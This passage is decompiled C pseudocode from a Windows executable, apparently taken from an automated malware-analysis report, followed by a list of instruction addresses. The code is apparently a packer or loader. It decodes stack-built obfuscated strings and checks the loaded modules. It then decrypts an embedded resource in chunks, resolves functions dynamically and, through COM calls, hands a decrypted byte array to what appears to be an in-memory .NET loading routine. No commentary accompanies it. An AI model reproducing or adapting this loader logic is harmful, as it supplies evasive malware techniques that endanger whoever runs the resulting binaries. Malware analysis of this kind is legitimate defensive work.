				CHAR* _t344;
				intOrPtr* _t349;
				int _t350;
				long _t352;
				signed int _t354;
				intOrPtr _t358;
				long _t359;
				CHAR* _t364;
				struct HINSTANCE__* _t365;
				CHAR* _t366;
				_Unknown_base(*)()* _t367;
				int _t368;
				int _t369;
				int _t370;
				intOrPtr* _t376;
				int _t378;
				intOrPtr _t379;
				intOrPtr* _t381;
				int _t383;
				intOrPtr* _t384;
				int _t385;
				int _t396;
				int _t399;
				int _t402;
				int _t405;
				intOrPtr* _t407;
				int _t413;
				int _t415;
				void* _t421;
				int _t422;
				int _t424;
				intOrPtr* _t428;
				intOrPtr _t429;
				intOrPtr* _t431;
				int _t432;
				int _t435;
				intOrPtr* _t437;
				int _t438;
				intOrPtr* _t439;
				int _t440;
				int _t442;
				signed int _t448;
				signed int _t451;
				signed int _t452;
				int _t469;
				int _t471;
				int _t482;
				signed int _t486;
				intOrPtr* _t488;
				intOrPtr* _t490;
				intOrPtr* _t492;
				intOrPtr _t493;
				void* _t494;
				struct HRSRC__* _t497;
				void* _t514;
				int _t519;
				intOrPtr* _t520;
				void* _t524;
				void* _t525;
				struct HINSTANCE__* _t526;
				intOrPtr _t527;
				void* _t531;
				void* _t535;
				struct HRSRC__* _t536;
				intOrPtr* _t537;
				intOrPtr* _t539;
				int _t542;
				int _t543;
				intOrPtr* _t547;
				intOrPtr* _t548;
				intOrPtr* _t549;
				intOrPtr* _t550;
				void* _t551;
				intOrPtr _t552;
				int _t555;
				void* _t556;
				void* _t557;
				void* _t558;
				void* _t559;
				void* _t560;
				void* _t561;
				void* _t562;
				intOrPtr* _t563;
				void* _t564;
				void* _t565;
				void* _t566;
				void* _t567;

				_t567 = __eflags;
				_t494 = __edx;
				__imp__OleInitialize(0); // executed
				 *((char*)(_t556 + 0x18)) = 0xe0;
				 *((char*)(_t556 + 0x19)) = 0x3b;
				 *((char*)(_t556 + 0x1a)) = 0x8d;
				 *((char*)(_t556 + 0x1b)) = 0x2a;
				 *((char*)(_t556 + 0x1c)) = 0xa2;
				 *((char*)(_t556 + 0x1d)) = 0x2a;
				 *((char*)(_t556 + 0x1e)) = 0x2a;
				 *((char*)(_t556 + 0x1f)) = 0x41;
				 *((char*)(_t556 + 0x20)) = 0xd3;
				 *((char*)(_t556 + 0x21)) = 0x20;
				 *((char*)(_t556 + 0x22)) = 0x64;
				 *((char*)(_t556 + 0x23)) = 6;
				 *((char*)(_t556 + 0x24)) = 0x8a;
				 *((char*)(_t556 + 0x25)) = 0xf7;
				 *((char*)(_t556 + 0x26)) = 0x3d;
				 *((char*)(_t556 + 0x27)) = 0x9d;
				 *((char*)(_t556 + 0x28)) = 0xd9;
				 *((char*)(_t556 + 0x29)) = 0xee;
				 *((char*)(_t556 + 0x2a)) = 0x15;
				 *((char*)(_t556 + 0x2b)) = 0x68;
				 *((char*)(_t556 + 0x2c)) = 0xf4;
				 *((char*)(_t556 + 0x2d)) = 0x76;
				 *((char*)(_t556 + 0x2e)) = 0xb9;
				 *((char*)(_t556 + 0x2f)) = 0x34;
				 *((char*)(_t556 + 0x30)) = 0xbf;
				 *((char*)(_t556 + 0x31)) = 0x1e;
				 *((char*)(_t556 + 0x32)) = 0xe7;
				 *((char*)(_t556 + 0x33)) = 0x78;
				 *((char*)(_t556 + 0x34)) = 0x98;
				 *((char*)(_t556 + 0x35)) = 0xe9;
				 *((char*)(_t556 + 0x36)) = 0x6f;
				 *((char*)(_t556 + 0x37)) = 0xb4;
				 *((char*)(_t556 + 0x38)) = 0;
				_push(E00401650(_t556 + 0x14, _t556 + 0x114));
				_t337 = E0040B99E(0, _t494, _t524, _t535, _t567);
				_t557 = _t556 + 0xc;
				if(_t337 == 0x41b2a0) {
					L80:
					__eflags = 0;
					return 0;
				} else {
					_t340 = CreateToolhelp32Snapshot(8, GetCurrentProcessId()); // executed
					_t525 = _t340;
					 *((intOrPtr*)(_t557 + 0x280)) = 0x224;
					 *((char*)(_t557 + 0x64)) = 0xce;
					 *((char*)(_t557 + 0x65)) = 0x27;
					 *((char*)(_t557 + 0x66)) = 0x9c;
					 *((char*)(_t557 + 0x67)) = 0x1a;
					 *((char*)(_t557 + 0x68)) = 0x95;
					 *((char*)(_t557 + 0x69)) = 0x2e;
					 *((char*)(_t557 + 0x6a)) = 0x22;
					 *((char*)(_t557 + 0x6b)) = 0x57;
					 *((char*)(_t557 + 0x6c)) = 0x91;
					 *((char*)(_t557 + 0x6d)) = 0x21;
					 *((char*)(_t557 + 0x6e)) = 0x57;
					 *((char*)(_t557 + 0x6f)) = 0x3a;
					 *((char*)(_t557 + 0x70)) = 0xf8;
					 *((char*)(_t557 + 0x71)) = 0x98;
					 *((char*)(_t557 + 0x72)) = 0x5b;
					 *((char*)(_t557 + 0x73)) = 0xf4;
					 *((char*)(_t557 + 0x74)) = 0xb5;
					 *((char*)(_t557 + 0x75)) = 0x87;
					 *((char*)(_t557 + 0x76)) = 0x7b;
					 *((char*)(_t557 + 0x77)) = 0xf;
					 *((char*)(_t557 + 0x78)) = 0xf4;
					 *((char*)(_t557 + 0x79)) = 0x76;
					 *((char*)(_t557 + 0x7a)) = 0xb9;
					 *((char*)(_t557 + 0x7b)) = 0x34;
					 *((char*)(_t557 + 0x7c)) = 0xbf;
					 *((char*)(_t557 + 0x7d)) = 0x1e;
					 *((char*)(_t557 + 0x7e)) = 0xe7;
					 *((char*)(_t557 + 0x7f)) = 0x78;
					 *((char*)(_t557 + 0x80)) = 0x98;
					 *((char*)(_t557 + 0x81)) = 0xe9;
					 *((char*)(_t557 + 0x82)) = 0x6f;
					 *((char*)(_t557 + 0x83)) = 0xb4;
					 *((char*)(_t557 + 0x84)) = 0;
					 *((char*)(_t557 + 0x18)) = 0xc0;
					 *((char*)(_t557 + 0x19)) = 0x38;
					 *((char*)(_t557 + 0x1a)) = 0x8d;
					 *((char*)(_t557 + 0x1b)) = 0x1f;
					 *((char*)(_t557 + 0x1c)) = 0x8e;
					 *((char*)(_t557 + 0x1d)) = 0x30;
					 *((char*)(_t557 + 0x1e)) = 0x65;
					 *((char*)(_t557 + 0x1f)) = 0x47;
					 *((char*)(_t557 + 0x20)) = 0xd3;
					 *((char*)(_t557 + 0x21)) = 0x29;
					 *((char*)(_t557 + 0x22)) = 0x3b;
					 *((char*)(_t557 + 0x23)) = 0x56;
					 *((char*)(_t557 + 0x24)) = 0xf8;
					 *((char*)(_t557 + 0x25)) = 0x98;
					 *((char*)(_t557 + 0x26)) = 0x5b;
					 *((char*)(_t557 + 0x27)) = 0xf4;
					 *((char*)(_t557 + 0x28)) = 0xb5;
					 *((char*)(_t557 + 0x29)) = 0x87;
					 *((char*)(_t557 + 0x2a)) = 0x7b;
					 *((char*)(_t557 + 0x2b)) = 0xf;
					 *((char*)(_t557 + 0x2c)) = 0xf4;
					 *((char*)(_t557 + 0x2d)) = 0x76;
					 *((char*)(_t557 + 0x2e)) = 0xb9;
					 *((char*)(_t557 + 0x2f)) = 0x34;
					 *((char*)(_t557 + 0x30)) = 0xbf;
					 *((char*)(_t557 + 0x31)) = 0x1e;
					 *((char*)(_t557 + 0x32)) = 0xe7;
					 *((char*)(_t557 + 0x33)) = 0x78;
					 *((char*)(_t557 + 0x34)) = 0x98;
					 *((char*)(_t557 + 0x35)) = 0xe9;
					 *((char*)(_t557 + 0x36)) = 0x6f;
					 *((char*)(_t557 + 0x37)) = 0xb4;
					 *((char*)(_t557 + 0x38)) = 0;
					_t341 = Module32First(_t525, _t557 + 0x278); // executed
					if(_t341 == 0) {
						L38:
						FindCloseChangeNotification(_t525); // executed
						_t526 = GetModuleHandleA(0);
						 *((char*)(_t557 + 0x1c)) = 0xfc;
						 *((char*)(_t557 + 0x1d)) = 0xb;
						 *((char*)(_t557 + 0x1e)) = 0xff;
						 *((char*)(_t557 + 0x1f)) = 0x75;
						 *((char*)(_t557 + 0x20)) = 0xe7;
						 *((char*)(_t557 + 0x21)) = 0x44;
						 *((char*)(_t557 + 0x22)) = 0x4b;
						 *((char*)(_t557 + 0x23)) = 0x23;
						 *((char*)(_t557 + 0x24)) = 0xbf;
						 *((char*)(_t557 + 0x25)) = 0x45;
						 *((char*)(_t557 + 0x26)) = 0x3b;
						 *((char*)(_t557 + 0x27)) = 0x56;
						 *((char*)(_t557 + 0x28)) = 0xf8;
						 *((char*)(_t557 + 0x29)) = 0x98;
						 *((char*)(_t557 + 0x2a)) = 0x5b;
						 *((char*)(_t557 + 0x2b)) = 0xf4;
						 *((char*)(_t557 + 0x2c)) = 0xb5;
						 *((char*)(_t557 + 0x2d)) = 0x87;
						 *((char*)(_t557 + 0x2e)) = 0x7b;
						 *((char*)(_t557 + 0x2f)) = 0xf;
						 *((char*)(_t557 + 0x30)) = 0xf4;
						 *((char*)(_t557 + 0x31)) = 0x76;
						 *((char*)(_t557 + 0x32)) = 0xb9;
						 *((char*)(_t557 + 0x33)) = 0x34;
						 *((char*)(_t557 + 0x34)) = 0xbf;
						 *((char*)(_t557 + 0x35)) = 0x1e;
						 *((char*)(_t557 + 0x36)) = 0xe7;
						 *((char*)(_t557 + 0x37)) = 0x78;
						 *((char*)(_t557 + 0x38)) = 0x98;
						 *((char*)(_t557 + 0x39)) = 0xe9;
						 *((char*)(_t557 + 0x3a)) = 0x6f;
						 *((char*)(_t557 + 0x3b)) = 0xb4;
						 *((char*)(_t557 + 0x3c)) = 0;
						_t344 = E00401650(_t557 + 0x18, _t557 + 0x158);
						_t558 = _t557 + 8;
						_t536 = FindResourceA(_t526, _t344, 0xa);
						 *(_t558 + 0x50) = _t536;
						_t551 = LoadResource(_t526, _t536);
						 *((intOrPtr*)(_t558 + 0x44)) = LockResource(_t551);
						_t349 = E0040B84D(0, _t557 + 0x18, _t526, SizeofResource(_t526, _t536)); // executed
						_push(0x40022);
						_t537 = _t349; // executed
						_t350 = E0040AF66(0, _t526, __eflags); // executed
						_t559 = _t558 + 8;
						 *(_t559 + 0x34) = _t350;
						__eflags = _t350;
						if(_t350 == 0) {
							 *(_t559 + 0x50) = 0;
						} else {
							E0040BA30(_t526, _t350, 0, 0x40022);
							_t486 =  *(_t559 + 0x40);
							_t559 = _t559 + 0xc;
							 *(_t559 + 0x50) = _t486;
						}
						E00401300( *(_t559 + 0x50));
						_t497 =  *(_t559 + 0x48);
						_t352 = SizeofResource(_t526, _t497);
						 *(_t559 + 0x40) = _t352;
						asm("cdq");
						_t354 = _t352 + (_t497 & 0x000003ff) >> 0xa;
						__eflags = _t354;
						if(_t354 > 0) {
							_t519 =  *(_t559 + 0x3c);
							_t482 = _t537 - _t519;
							__eflags = _t482;
							 *(_t559 + 0x34) = _t519;
							 *(_t559 + 0x88) = _t482;
							 *(_t559 + 0x38) = _t354;
							do {
								_t424 =  *(_t559 + 0x34);
								_push( *(_t559 + 0x88) + _t424);
								_push(0x400);
								_push(_t424);
								E00401560(0,  *((intOrPtr*)(_t559 + 0x54)));
								 *(_t559 + 0x34) =  *(_t559 + 0x34) + 0x400;
								_t179 = _t559 + 0x38;
								 *_t179 =  *(_t559 + 0x38) - 1;
								__eflags =  *_t179;
							} while ( *_t179 != 0);
						}
						_t448 =  *(_t559 + 0x40) & 0x800003ff;
						__eflags = _t448;
						if(_t448 < 0) {
							_t448 = (_t448 - 0x00000001 | 0xfffffc00) + 1;
							__eflags = _t448;
						}
						__eflags = _t448;
						if(_t448 > 0) {
							_t421 =  *(_t559 + 0x40) - _t448;
							_push(_t421 + _t537);
							_push(_t448);
							_t422 = _t421 +  *((intOrPtr*)(_t559 + 0x44));
							__eflags = _t422;
							_push(_t422);
							E00401560(0,  *((intOrPtr*)(_t559 + 0x58)));
						}
						E0040BA30(_t526,  *(_t559 + 0x3c), 0,  *(_t559 + 0x40));
						_t560 = _t559 + 0xc;
						FreeResource(_t551);
						_t552 =  *_t537;
						 *((intOrPtr*)(_t560 + 0x94)) = _t552;
						_t358 = E0040B84D(0,  *(_t559 + 0x40), _t526, _t552); // executed
						_t561 = _t560 + 4;
						 *((intOrPtr*)(_t561 + 0x40)) = _t358;
						_t359 = SizeofResource(_t526,  *(_t560 + 0x4c));
						_t527 =  *((intOrPtr*)(_t561 + 0x38));
						_t192 = _t537 + 4; // 0x4
						E0040AC60(_t527, _t561 + 0x98, _t192, _t359);
						E0040BA30(_t527, _t537, 0,  *((intOrPtr*)(_t561 + 0x50)));
						_t528 = _t527 + 0xe;
						 *((char*)(_t561 + 0x34)) = 0xce;
						 *((char*)(_t561 + 0x35)) = 0x27;
						 *((char*)(_t561 + 0x36)) = 0x9c;
						 *((char*)(_t561 + 0x37)) = 0x1a;
						 *((char*)(_t561 + 0x38)) = 0x95;
						 *((char*)(_t561 + 0x39)) = 0x21;
						 *((char*)(_t561 + 0x3a)) = 0x2e;
						 *((char*)(_t561 + 0x3b)) = 0xd;
						 *((char*)(_t561 + 0x3c)) = 0xdb;
						 *((char*)(_t561 + 0x3d)) = 0x29;
						 *((char*)(_t561 + 0x3e)) = 0x57;
						 *((char*)(_t561 + 0x3f)) = 0x56;
						 *((char*)(_t561 + 0x40)) = 0xf8;
						 *((char*)(_t561 + 0x41)) = 0x98;
						 *((char*)(_t561 + 0x42)) = 0x5b;
						 *((char*)(_t561 + 0x43)) = 0xf4;
						 *((char*)(_t561 + 0x44)) = 0xb5;
						 *((char*)(_t561 + 0x45)) = 0x87;
						 *((char*)(_t561 + 0x46)) = 0x7b;
						 *((char*)(_t561 + 0x47)) = 0xf;
						 *((char*)(_t561 + 0x48)) = 0xf4;
						 *((char*)(_t561 + 0x49)) = 0x76;
						 *((char*)(_t561 + 0x4a)) = 0xb9;
						 *((char*)(_t561 + 0x4b)) = 0x34;
						 *((char*)(_t561 + 0x4c)) = 0xbf;
						 *((char*)(_t561 + 0x4d)) = 0x1e;
						 *((char*)(_t561 + 0x4e)) = 0xe7;
						 *((char*)(_t561 + 0x4f)) = 0x78;
						 *((char*)(_t561 + 0x50)) = 0x98;
						 *((char*)(_t561 + 0x51)) = 0xe9;
						 *((char*)(_t561 + 0x52)) = 0x6f;
						 *((char*)(_t561 + 0x53)) = 0xb4;
						 *((char*)(_t561 + 0x54)) = 0;
						_t364 = E00401650(_t561 + 0x30, _t561 + 0x110);
						_t562 = _t561 + 0x24;
						_t365 = LoadLibraryA(_t364); // executed
						_t538 = _t365;
						 *((char*)(_t562 + 0x10)) = 0xe0;
						 *((char*)(_t562 + 0x11)) = 0x18;
						 *((char*)(_t562 + 0x12)) = 0xad;
						 *((char*)(_t562 + 0x13)) = 0x36;
						 *((char*)(_t562 + 0x14)) = 0x95;
						 *((char*)(_t562 + 0x15)) = 0x21;
						_t451 = _t562 + 0x134;
						 *((char*)(_t562 + 0x1e)) = 0x2a;
						 *((char*)(_t562 + 0x1f)) = 0x57;
						 *((char*)(_t562 + 0x20)) = 0xda;
						 *((char*)(_t562 + 0x21)) = 0xc;
						 *((char*)(_t562 + 0x22)) = 0x55;
						 *((char*)(_t562 + 0x23)) = 0x25;
						 *((char*)(_t562 + 0x24)) = 0x8c;
						 *((char*)(_t562 + 0x25)) = 0xf9;
						 *((char*)(_t562 + 0x26)) = 0x35;
						 *((char*)(_t562 + 0x27)) = 0x97;
						 *((char*)(_t562 + 0x28)) = 0xd0;
						 *((char*)(_t562 + 0x29)) = 0x87;
						 *((char*)(_t562 + 0x2a)) = 0x7b;
						 *((char*)(_t562 + 0x2b)) = 0xf;
						 *((char*)(_t562 + 0x2c)) = 0xf4;
						 *((char*)(_t562 + 0x2d)) = 0x76;
						 *((char*)(_t562 + 0x2e)) = 0xb9;
						 *((char*)(_t562 + 0x2f)) = 0x34;
						 *((char*)(_t562 + 0x30)) = 0xbf;
						 *((char*)(_t562 + 0x31)) = 0x1e;
						 *((char*)(_t562 + 0x32)) = 0xe7;
						 *((char*)(_t562 + 0x33)) = 0x78;
						 *((char*)(_t562 + 0x34)) = 0x98;
						 *((char*)(_t562 + 0x35)) = 0xe9;
						 *((char*)(_t562 + 0x36)) = 0x6f;
						 *((char*)(_t562 + 0x37)) = 0xb4;
						 *((char*)(_t562 + 0x38)) = 0;
						_t366 = E00401650(_t562 + 0x14, _t451);
						_t563 = _t562 + 8;
						_t367 = GetProcAddress(_t365, _t366);
						__eflags = _t367;
						_t452 = _t451 & 0xffffff00 | _t367 != 0x00000000;
						__eflags = _t452;
						 *(_t563 + 0x47) = _t452 == 0;
						 *0x423480 = _t367;
						 *((intOrPtr*)(_t563 + 0x80)) = 0;
						 *((intOrPtr*)(_t563 + 0x84)) = 0;
						 *((intOrPtr*)(_t563 + 0x4c)) = 0;
						 *(_t563 + 0x58) = 0;
						 *(_t563 + 0x54) = 0;
						__eflags = _t452;
						if(_t452 != 0) {
							_t368 =  *_t367(0x41b230, 0x41b220, _t563 + 0x80); // executed
							__eflags = _t368;
							if(_t368 >= 0) {
								__eflags =  *(_t563 + 0x47);
								if( *(_t563 + 0x47) == 0) {
									 *((intOrPtr*)(_t563 + 0x17c)) = _t563 + 0x17c;
									E004018F0( *((intOrPtr*)(_t563 + 0x38)), _t563 + 0x17c, _t563 + 0x17c,  *((intOrPtr*)(_t563 + 0x38)), 3);
									_t376 =  *((intOrPtr*)(_t563 + 0x80));
									_t378 =  *((intOrPtr*)( *((intOrPtr*)( *_t376 + 0xc))))(_t376,  *((intOrPtr*)(_t563 + 0x178)), 0x41b240, _t563 + 0x84); // executed
									__eflags = _t378;
									if(_t378 >= 0) {
										_t381 =  *((intOrPtr*)(_t563 + 0x84));
										_t383 =  *((intOrPtr*)( *((intOrPtr*)( *_t381 + 0x24))))(_t381, 0x41b210, 0x41b290, _t563 + 0x4c); // executed
										__eflags = _t383;
										if(_t383 >= 0) {
											_t384 =  *((intOrPtr*)(_t563 + 0x4c));
											_t385 =  *((intOrPtr*)( *((intOrPtr*)( *_t384 + 0x28))))(_t384); // executed
											__eflags = _t385;
											if(_t385 >= 0) {
												 *((intOrPtr*)(_t563 + 0x38)) = 0;
												E00401870(_t563 + 0x44, _t552, "_._");
												_t539 = __imp__#8;
												 *((intOrPtr*)(_t563 + 0x40)) = 0;
												 *_t539(_t563 + 0x94);
												E00401870(_t563 + 0x3c, _t552, "___");
												 *_t539(_t563 + 0xa4);
												 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t563 + 0x4c)))) + 0x34))))( *((intOrPtr*)(_t563 + 0x50)), E004018D0(_t563 + 0x58)); // executed
												_t542 =  *(_t563 + 0x58);
												__eflags = _t542;
												if(_t542 == 0) {
													E0040AD90(0x80004003);
												}
												_t396 =  *((intOrPtr*)( *((intOrPtr*)( *_t542))))(_t542, 0x41b270, E004018D0(_t563 + 0x54));
												 *((intOrPtr*)(_t563 + 0x94)) = _t552 + 0xfffffff2;
												 *((intOrPtr*)(_t563 + 0x98)) = 0;
												__imp__#15(0x11, 1, _t563 + 0x88); // executed
												_t543 = _t396;
												 *((intOrPtr*)(_t563 + 0x50)) = 0;
												__imp__#23(_t543, _t563 + 0x48);
												E0040B350(0, _t528, _t543,  *((intOrPtr*)(_t563 + 0x48)), _t528, _t552 + 0xfffffff2);
												_t564 = _t563 + 0xc;
												__imp__#24(_t543);
												_t399 =  *(_t564 + 0x54);
												__eflags = _t399;
												if(_t399 == 0) {
													_t399 = E0040AD90(0x80004003);
												}
												 *((intOrPtr*)( *((intOrPtr*)( *_t399 + 0xb4))))(_t399, _t543, E004018D0(_t564 + 0x34)); // executed
												__eflags = _t543;
												if(_t543 != 0) {
													__imp__#16(_t543); // executed
												}
												_t402 =  *(_t564 + 0x34);
												__eflags = _t402;
												if(_t402 == 0) {
													_t402 = E0040AD90(0x80004003);
												}
												_t469 =  *(_t564 + 0x40);
												_t555 = _t402;
												__eflags = _t469;
												if(_t469 == 0) {
													_t531 = 0;
													__eflags = 0;
												} else {
													_t531 =  *_t469;
												}
												 *((intOrPtr*)( *((intOrPtr*)( *_t402 + 0x44))))(_t555, _t531, E004018D0(_t564 + 0x3c)); // executed
												__imp__#411(0xc, 0, 0);
												_t471 =  *(_t564 + 0x3c);
												__eflags = _t471;
												if(_t471 == 0) {
													E0040AD90(0x80004003);
												}
												_t405 =  *(_t564 + 0x38);
												__eflags = _t405;
												if(_t405 == 0) {
													_t514 = 0;
													__eflags = 0;
												} else {
													_t514 =  *_t405;
												}
												_t563 = _t564 - 0x10;
												_t407 = _t563;
												 *_t407 =  *((intOrPtr*)(_t564 + 0x94));
												 *((intOrPtr*)(_t407 + 4)) =  *((intOrPtr*)(_t563 + 0xb0));
												 *((intOrPtr*)(_t407 + 8)) =  *((intOrPtr*)(_t563 + 0xb8));
												_t528 =  *((intOrPtr*)(_t563 + 0xc0));
												 *((intOrPtr*)(_t407 + 0xc)) =  *((intOrPtr*)(_t563 + 0xc0));
												 *((intOrPtr*)( *((intOrPtr*)( *_t471 + 0xe4))))(_t471, _t514, 0x118, 0, 0, _t564 + 0xa4);
												_t538 = __imp__#9; // 0x74f3cf00
												_t538->i(_t563 + 0xa4);
												E004019A0(_t563 + 0x38);
												_t538->i(_t563 + 0x94);
												_t413 =  *(_t563 + 0x3c);
												__eflags = _t413;
												if(_t413 != 0) {
													 *((intOrPtr*)( *((intOrPtr*)( *_t413 + 8))))(_t413);
												}
												E004019A0(_t563 + 0x40);
												_t415 =  *(_t563 + 0x34);
												__eflags = _t415;
												if(_t415 != 0) {
													 *((intOrPtr*)( *((intOrPtr*)( *_t415 + 8))))(_t415);
												}
											}
										}
									}
									_t379 =  *((intOrPtr*)(_t563 + 0x174));
									__eflags = _t379 - _t563 + 0x178;
									if(__eflags != 0) {
										_push(_t379);
										E0040B6B5(0, _t528, _t538, __eflags);
										_t563 = _t563 + 4;
									}
								}
							}
							_t369 =  *(_t563 + 0x54);
							__eflags = _t369;
							if(_t369 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t369 + 8))))(_t369);
							}
							_t370 =  *(_t563 + 0x58);
							__eflags = _t370;
							if(_t370 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t370 + 8))))(_t370);
							}
						}
						goto L80;
					} else {
						_t428 = E00401650(_t557 + 0x60, _t557 + 0xd4);
						_t565 = _t557 + 8;
						_t547 = _t428;
						_t520 = _t565 + 0x298;
						while(1) {
							_t429 =  *_t520;
							if(_t429 !=  *_t547) {
								break;
							}
							if(_t429 == 0) {
								L7:
								_t429 = 0;
							} else {
								_t493 =  *((intOrPtr*)(_t520 + 1));
								if(_t493 !=  *((intOrPtr*)(_t547 + 1))) {
									break;
								} else {
									_t520 = _t520 + 2;
									_t547 = _t547 + 2;
									if(_t493 != 0) {
										continue;
									} else {
										goto L7;
									}
								}
							}
							L9:
							if(_t429 != 0) {
								_t431 = E00401650(_t565 + 0x14, _t565 + 0xb4);
								_t557 = _t565 + 8;
								_t548 = _t431;
								_t488 = _t557 + 0x298;
								while(1) {
									_t432 =  *_t488;
									__eflags = _t432 -  *_t548;
									if(_t432 !=  *_t548) {
										break;
									}
									__eflags = _t432;
									if(_t432 == 0) {
										L16:
										_t432 = 0;
									} else {
										_t432 =  *((intOrPtr*)(_t488 + 1));
										__eflags = _t432 -  *((intOrPtr*)(_t548 + 1));
										if(_t432 !=  *((intOrPtr*)(_t548 + 1))) {
											break;
										} else {
											_t488 = _t488 + 2;
											_t548 = _t548 + 2;
											__eflags = _t432;
											if(_t432 != 0) {
												continue;
											} else {
												goto L16;
											}
										}
									}
									L18:
									__eflags = _t432;
									if(_t432 == 0) {
										goto L10;
									} else {
										_t435 = Module32Next(_t525, _t557 + 0x278);
										__eflags = _t435;
										if(_t435 != 0) {
											do {
												_t437 = E00401650(_t557 + 0x60, _t557 + 0xd4);
												_t566 = _t557 + 8;
												_t549 = _t437;
												_t490 = _t566 + 0x298;
												while(1) {
													_t438 =  *_t490;
													__eflags = _t438 -  *_t549;
													if(_t438 !=  *_t549) {
														break;
													}
													__eflags = _t438;
													if(_t438 == 0) {
														L26:
														_t438 = 0;
													} else {
														_t438 =  *((intOrPtr*)(_t490 + 1));
														__eflags = _t438 -  *((intOrPtr*)(_t549 + 1));
														if(_t438 !=  *((intOrPtr*)(_t549 + 1))) {
															break;
														} else {
															_t490 = _t490 + 2;
															_t549 = _t549 + 2;
															__eflags = _t438;
															if(_t438 != 0) {
																continue;
															} else {
																goto L26;
															}
														}
													}
													L28:
													__eflags = _t438;
													if(_t438 == 0) {
														goto L10;
													} else {
														_t439 = E00401650(_t566 + 0x14, _t566 + 0xb4);
														_t557 = _t566 + 8;
														_t550 = _t439;
														_t492 = _t557 + 0x298;
														while(1) {
															_t440 =  *_t492;
															__eflags = _t440 -  *_t550;
															if(_t440 !=  *_t550) {
																break;
															}
															__eflags = _t440;
															if(_t440 == 0) {
																L34:
																_t440 = 0;
															} else {
																_t440 =  *((intOrPtr*)(_t492 + 1));
																__eflags = _t440 -  *((intOrPtr*)(_t550 + 1));
																if(_t440 !=  *((intOrPtr*)(_t550 + 1))) {
																	break;
																} else {
																	_t492 = _t492 + 2;
																	_t550 = _t550 + 2;
																	__eflags = _t440;
																	if(_t440 != 0) {
																		continue;
																	} else {
																		goto L34;
																	}
																}
															}
															L36:
															__eflags = _t440;
															if(_t440 == 0) {
																goto L10;
															} else {
																goto L37;
															}
															goto L81;
														}
														asm("sbb eax, eax");
														asm("sbb eax, 0xffffffff");
														goto L36;
													}
													goto L81;
												}
												asm("sbb eax, eax");
												asm("sbb eax, 0xffffffff");
												goto L28;
												L37:
												_t442 = Module32Next(_t525, _t557 + 0x278);
												__eflags = _t442;
											} while (_t442 != 0);
										}
										goto L38;
									}
									goto L81;
								}
								asm("sbb eax, eax");
								asm("sbb eax, 0xffffffff");
								goto L18;
							} else {
								L10:
								CloseHandle(_t525);
								return 0;
							}
							goto L81;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						goto L9;
					}
				}
				L81:
			}

0x004019f0
0x004019f0
0x004019fd
0x00401a10
0x00401a15
0x00401a1a
0x00401a1f
0x00401a24
0x00401a29
0x00401a2e
0x00401a33
0x00401a38
0x00401a3d
0x00401a42
0x00401a47
0x00401a4c
0x00401a51
0x00401a56
0x00401a5b
0x00401a60
0x00401a65
0x00401a6a
0x00401a6f
0x00401a74
0x00401a79
0x00401a7e
0x00401a83
0x00401a88
0x00401a8d
0x00401a92
0x00401a97
0x00401a9c
0x00401aa1
0x00401aa6
0x00401aab
0x00401ab0
0x00401ab9
0x00401aba
0x00401abf
0x00401ac7
0x0040248d
0x0040248d
0x00402496
0x00401acd
0x00401ad6
0x00401ae2
0x00401ae6
0x00401af1
0x00401af6
0x00401afb
0x00401b00
0x00401b05
0x00401b0a
0x00401b0f
0x00401b14
0x00401b19
0x00401b1e
0x00401b23
0x00401b28
0x00401b2d
0x00401b32
0x00401b37
0x00401b3c
0x00401b41
0x00401b46
0x00401b4b
0x00401b50
0x00401b55
0x00401b5a
0x00401b5f
0x00401b64
0x00401b69
0x00401b6e
0x00401b73
0x00401b78
0x00401b7d
0x00401b85
0x00401b8d
0x00401b95
0x00401b9d
0x00401ba4
0x00401ba9
0x00401bae
0x00401bb3
0x00401bb8
0x00401bbd
0x00401bc2
0x00401bc7
0x00401bcc
0x00401bd1
0x00401bd6
0x00401bdb
0x00401be0
0x00401be5
0x00401bea
0x00401bef
0x00401bf4
0x00401bf9
0x00401bfe
0x00401c03
0x00401c08
0x00401c0d
0x00401c12
0x00401c17
0x00401c1c
0x00401c21
0x00401c26
0x00401c2b
0x00401c30
0x00401c35
0x00401c3a
0x00401c3f
0x00401c44
0x00401c48
0x00401c4f
0x00401dc3
0x00401dc4
0x00401de0
0x00401de2
0x00401de7
0x00401dec
0x00401df1
0x00401df6
0x00401dfb
0x00401e00
0x00401e05
0x00401e0a
0x00401e0f
0x00401e14
0x00401e19
0x00401e1e
0x00401e23
0x00401e28
0x00401e2d
0x00401e32
0x00401e37
0x00401e3c
0x00401e41
0x00401e46
0x00401e4b
0x00401e50
0x00401e55
0x00401e5a
0x00401e5f
0x00401e64
0x00401e69
0x00401e6e
0x00401e73
0x00401e78
0x00401e7d
0x00401e82
0x00401e86
0x00401e8b
0x00401e96
0x00401e9a
0x00401ea4
0x00401eaf
0x00401eba
0x00401ebf
0x00401ec4
0x00401ec6
0x00401ecb
0x00401ece
0x00401ed2
0x00401ed4
0x00401eef
0x00401ed6
0x00401edd
0x00401ee2
0x00401ee6
0x00401ee9
0x00401ee9
0x00401ef7
0x00401efc
0x00401f02
0x00401f08
0x00401f0c
0x00401f15
0x00401f18
0x00401f1a
0x00401f1c
0x00401f22
0x00401f22
0x00401f24
0x00401f28
0x00401f2f
0x00401f33
0x00401f33
0x00401f40
0x00401f45
0x00401f4a
0x00401f4b
0x00401f50
0x00401f58
0x00401f58
0x00401f58
0x00401f58
0x00401f33
0x00401f63
0x00401f63
0x00401f69
0x00401f72
0x00401f72
0x00401f72
0x00401f73
0x00401f75
0x00401f7b
0x00401f80
0x00401f81
0x00401f86
0x00401f86
0x00401f8c
0x00401f8d
0x00401f8d
0x00401f9d
0x00401fa2
0x00401fa6
0x00401fac
0x00401faf
0x00401fb6
0x00401fbf
0x00401fc4
0x00401fc8
0x00401fce
0x00401fd3
0x00401fe0
0x00401fec
0x00401ffe
0x00402001
0x00402006
0x0040200b
0x00402010
0x00402015
0x0040201a
0x0040201f
0x00402024
0x00402029
0x0040202e
0x00402033
0x00402038
0x0040203d
0x00402042
0x00402047
0x0040204c
0x00402051
0x00402056
0x0040205b
0x00402060
0x00402065
0x0040206a
0x0040206f
0x00402074
0x00402079
0x0040207e
0x00402083
0x00402088
0x0040208d
0x00402092
0x00402097
0x0040209c
0x004020a1
0x004020a5
0x004020aa
0x004020ae
0x004020b4
0x004020b6
0x004020bb
0x004020c0
0x004020c5
0x004020ca
